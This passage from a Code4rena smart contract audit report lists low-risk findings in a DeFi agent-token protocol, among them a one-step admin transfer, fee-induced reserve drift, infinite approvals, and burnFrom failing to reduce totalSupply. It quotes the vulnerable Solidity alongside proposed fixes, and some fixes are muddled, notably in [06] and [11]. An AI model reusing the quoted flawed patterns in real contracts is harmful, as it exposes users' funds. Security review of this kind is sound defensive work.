// Inside both prompt() and promptMulti() functions
address agentTba = agentNft.virtualInfo(agentId).tba;
require(agentTba != address(0), "Invalid agentId");
token.safeTransferFrom(sender, agentTba, amounts[i]);This simple check will prevent tokens from being accidentally burned due to invalid agent IDs, protecting users from permanent loss of funds.
[04] Risky one-step admin transfer in ContributionNft.sol
The ContributionNft contract implements a one-step admin transfer pattern via the setAdmin function:
function setAdmin(address newAdmin) public {
require(_msgSender() == _admin, "Only admin can set admin");
_admin = newAdmin;
}This approach is risky because it allows the current admin to immediately and irreversibly transfer admin rights to any address in a single transaction. If the admin address is mistyped, set to an address incapable of transaction signing, or set to the zero address, the contract’s admin privileges can be permanently lost. There is no confirmation or acceptance required from the new admin, increasing the risk of accidental or malicious loss of control.
Impact
- Permanent loss of admin privileges if the address is set incorrectly.
- No guarantee that the new admin can or will manage the contract.
- No way to recover admin rights if transferred to an invalid address.
function setAdmin(address newAdmin) public {
require(_msgSender() == _admin, "Only admin can set admin");
_admin = newAdmin;
}Recommended mitigation steps
Adopt a two-step admin transfer process, similar to OpenZeppelin’s Ownable2Step pattern. This involves:
- The current admin proposes a new admin address (
transferAdmin). - The new admin must explicitly accept the role in a separate transaction (
acceptAdmin).
This ensures that admin control is only transferred to an address that is able and willing to accept the role, and prevents accidental or malicious loss of admin privileges.
Example mitigation
address private _pendingAdmin;
function transferAdmin(address newAdmin) public {
require(_msgSender() == _admin, "Only admin can transfer admin");
require(newAdmin != address(0), "New admin cannot be zero address");
_pendingAdmin = newAdmin;
// Emit event for the pending transfer
}
function acceptAdmin() public {
require(_msgSender() == _pendingAdmin, "Only pending admin can accept role");
_admin = _pendingAdmin;
_pendingAdmin = address(0);
// Emit event for the completed transfer
}This pattern ensures that admin rights are only transferred to a valid and responsive address, reducing the risk of accidental or permanent loss of control.
[05] Fee-induced reserve inconsistency in FRouter
In the FRouter contract, swap fees are deducted from the output amount after the swap amount is calculated using the reserves, but these fees are not accounted for in the reserve updates. This creates a discrepancy between the protocol’s internal reserve accounting and the actual token balances held by the pair contract after each trade.
Root cause
- The router calculates the swap output using the reserves and then deducts the fee from the output amount, transferring the fee separately to the tax vault.
- However, the pair contract’s reserves are updated based on the pre-fee output, not the net output actually received by the user.
uint256 amountOut = getAmountsOut(tokenAddress, assetToken, amountIn);
uint fee = factory.sellTax();
uint256 txFee = (fee * amountOut) / 100;
uint256 amount = amountOut - txFee;
address feeTo = factory.taxVault();
pair.transferAsset(to, amount);
pair.transferAsset(feeTo, txFee);
pair.swap(amountIn, 0, 0, amountOut);Impact
- The reserves recorded by the pair contract may diverge from the actual token balances after repeated trades, leading to inaccurate price calculations and potential arbitrage opportunities.
- Over time, this could degrade the integrity of the AMM’s pricing and reserve logic, especially if fees are significant or trading volume is high.
Recommended mitigation steps
To maintain reserve consistency, fees should be deducted before calculating the swap output and updating reserves. This ensures that the reserves always match the actual balances and reflect the true state of the pool. For example, the fee can be incorporated into the amount calculation or deducted from the input before calling the swap, so that the pair’s reserve update logic remains accurate.
[06] Duplicate import statement for AgentFactoryV3.sol in FGenesis.sol
In FGenesis.sol, the module AgentFactoryV3.sol is imported twice at the top of the file:
import "../virtualPersona/AgentFactoryV3.sol"; // Line 8
import "../virtualPersona/AgentFactoryV3.sol"; // Line 11This duplication is unnecessary and could lead to confusion for maintainers or reviewers. While it does not directly impact contract functionality or security, it is a code quality issue that can be easily avoided. Redundant imports may also introduce ambiguity if the file is refactored in the future or if conditional compilation is used.
Recommended mitigation steps
Remove the redundant import statement so that AgentFactoryV3.sol is imported only once at the top of the contract file.
import "../virtualPersona/AgentFactoryV3.sol";
...
import "../virtualPersona/AgentFactoryV3.sol";[07] Misconception in using block.timestamp + X for swap deadlines
A common misconception in DeFi contracts is that setting a swap deadline as block.timestamp + X (e.g., block.timestamp + 5 minutes) ensures the transaction is only valid for a real-world time window after the user initiates it. This pattern is used in both UniswapV2Router02 and AgentTax.sol:
IUniswapV2Router02(swapRouter).swapExactETHForTokensSupportingFeeOnTransferTokens{value: msg.value}(
minAmountOut, path, msg.sender, block.timestamp + 5 minutes
);
// AgentTax.sol
router.swapExactTokensForTokens(amountToSwap, minOutput, path, address(this), block.timestamp + 300);However, block.timestamp reflects the timestamp of the block in which the transaction is included, not when it was submitted. As a result, if a transaction is submitted at time T0 but only included in a block at T0 + 1 hour, the deadline will still be valid as long as the block’s timestamp is less than the deadline. This means the window is relative to block inclusion, not user intent.
Impact
- Users and developers may believe they are enforcing a strict real-world window for transaction validity, but in reality, the transaction may be included much later than intended.
- This can lead to unexpected execution, stale pricing, or MEV exploitation if the transaction sits in the mempool for an extended period.
Recommended mitigation steps
If the intent is to enforce a real-world time window, the contract should:
- Accept a client-supplied timestamp of when the transaction was initiated and compare
block.timestampto that value plus the allowed window. - Alternatively, use off-chain logic to cancel or replace transactions that are not mined within the desired time frame.
- At minimum, document this limitation in the contract and user documentation to avoid misunderstanding.
[08] Widespread use of infinite token approvals
The protocol makes extensive use of infinite token approvals (type(uint256).max) across multiple contracts. While this is a common pattern in DeFi to save gas on repeated approvals, it can pose risks with certain token implementations. Examples include:
BondingTax.sol:
IERC20(taxToken).forceApprove(router_, type(uint256).max);AgentMigrator.sol:
IERC20(lp).approve(veToken, type(uint256).max);AgentFactory.sol:
IERC20(lp).approve(veToken, type(uint256).max);AeroAdaptor.sol:
IERC20(tokenIn).forceApprove(router_, type(uint256).max);Impact
Some ERC20 tokens (like COMP) may downcast the approval value to a smaller type (e.g., uint96) rather than treating it as infinite. This can lead to:
- Potential transaction failures if tokens downcast the approval value.
- Increased risk if a spender contract is compromised, as they have unlimited approval.
- Unnecessary exposure to risk when large approvals aren’t needed.
- Gas wastage when approvals need to be reset due to downcasting.
Recommended mitigation steps
- Use exact approval amounts instead of
type(uint256).maxwhere possible. -
If infinite approvals are necessary for gas optimization:
- Add a function to revoke approvals when they’re no longer needed.
- Document which tokens are known to be compatible/incompatible.
- Consider implementing approval amount checks for known problematic tokens.
- For critical operations, consider implementing a pattern where approvals are set and used in the same transaction.
[09] Missing virtual functions for inheritance
Several internal functions across the codebase that are likely to need customization in derived contracts are not marked as virtual. This limits the ability to properly override these functions in inherited contracts and could force developers to duplicate code instead of extending it.
Example patterns that should be virtual include:
- Internal hooks for token operations
- State modification functions
- Validation functions
Impact
- Reduced code reusability.
- Potential code duplication in derived contracts.
- Increased maintenance burden when changes are needed.
- Risk of bugs when developers are forced to copy and modify code instead of properly inheriting.
Recommended mitigation steps
- Audit internal functions and mark appropriate ones as
virtual. - Add proper documentation for overrideable functions.
- Consider creating explicit hooks for key operations.
- Follow the Open-Closed Principle: design for extension.
[10] totalSupply not updated on burning in FERC20
The FERC20 contract’s burnFrom function reduces the user’s balance but does not decrease _totalSupply. This breaks ERC20 compliance and causes totalSupply() to report incorrect values after burns.
The root cause is in the burnFrom function implementation:
function burnFrom(address user, uint256 amount) public onlyOwner {
require(user != address(0), "Invalid address");
_balances[user] = _balances[user] - amount;
emit Transfer(user, address(0), amount);
}This function only modifies the user’s balance but fails to update the totalSupply, unlike standard ERC20 implementations where burning tokens should reduce both the user’s balance and the totalSupply.
Impact
- Inaccurate token economics: the reported
totalSupplywill be higher than the actual circulating supply. - External systems relying on correct supply data will malfunction.
- Potential price manipulation: artificially inflated supply metrics could affect token valuation.
- Broken integrations: systems that rely on the total supply for calculations (e.g., voting power, rewards) will use incorrect values.
Recommended mitigation steps
Update the burnFrom function to decrease the _totalSupply when burning tokens:
function burnFrom(address user, uint256 amount) public onlyOwner {
require(user != address(0), "Invalid address");
_balances[user] = _balances[user] - amount;
_totalSupply -= amount; // Add this line to update total supply
emit Transfer(user, address(0), amount);
}Additionally, consider using the internal _burn function that already exists in the contract to avoid code duplication:
function burnFrom(address user, uint256 amount) public onlyOwner {
_burn(user, amount);
emit Transfer(user, address(0), amount);
}And update the _burn function to also decrease the totalSupply:
function _burn(address user, uint256 amount) internal {
require(user != address(0), "Invalid address");
_balances[user] = _balances[user] - amount;
_totalSupply -= amount; // Add this line
}[11] Wrong max transaction limit after burns
The FERC20 contract’s _maxTxAmount is calculated based on the initial _totalSupply and is not updated when tokens are burned. This issue is compounded by the previously reported bug where _totalSupply is not decreased during burns. Even if the total supply bug is fixed, the max transaction limit would still need to be recalculated after burns.
The root cause is in the _updateMaxTx function, which is only called at deployment and when explicitly invoked:
function _updateMaxTx(uint _maxTx) internal {
maxTx = _maxTx;
_maxTxAmount = (maxTx * _totalSupply) / 100;
emit MaxTxUpdated(_maxTx);
}This function is not called after burns, so _maxTxAmount remains tied to the original (higher) supply, allowing disproportionately large transfers relative to the actual circulating supply.
Impact
- Incorrect enforcement of transaction limits, undermining tokenomics.
- Anti-whale mechanisms become ineffective after burns.
- Users can transfer larger percentages of the circulating supply than intended (up to 2x the intended percentage after 50% of supply is burned).
- Potential market manipulation through unexpectedly large trades.
Recommended mitigation steps
There are two approaches to fix this issue:
-
Update
_maxTxAmountafter burns:function burnFrom(address user, uint256 amount) public onlyOwner { require(user != address(0), "Invalid address"); _balances[user] = _balances[user] - amount; _totalSupply -= amount; // Fix for the first bug _updateMaxTx(maxTx); // Recalculate _maxTxAmount based on new supply emit Transfer(user, address(0), amount); } - Implement proper upgrade tests that verify storage.
Disclosures
C4 is an open organization governed by participants in the community.
C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.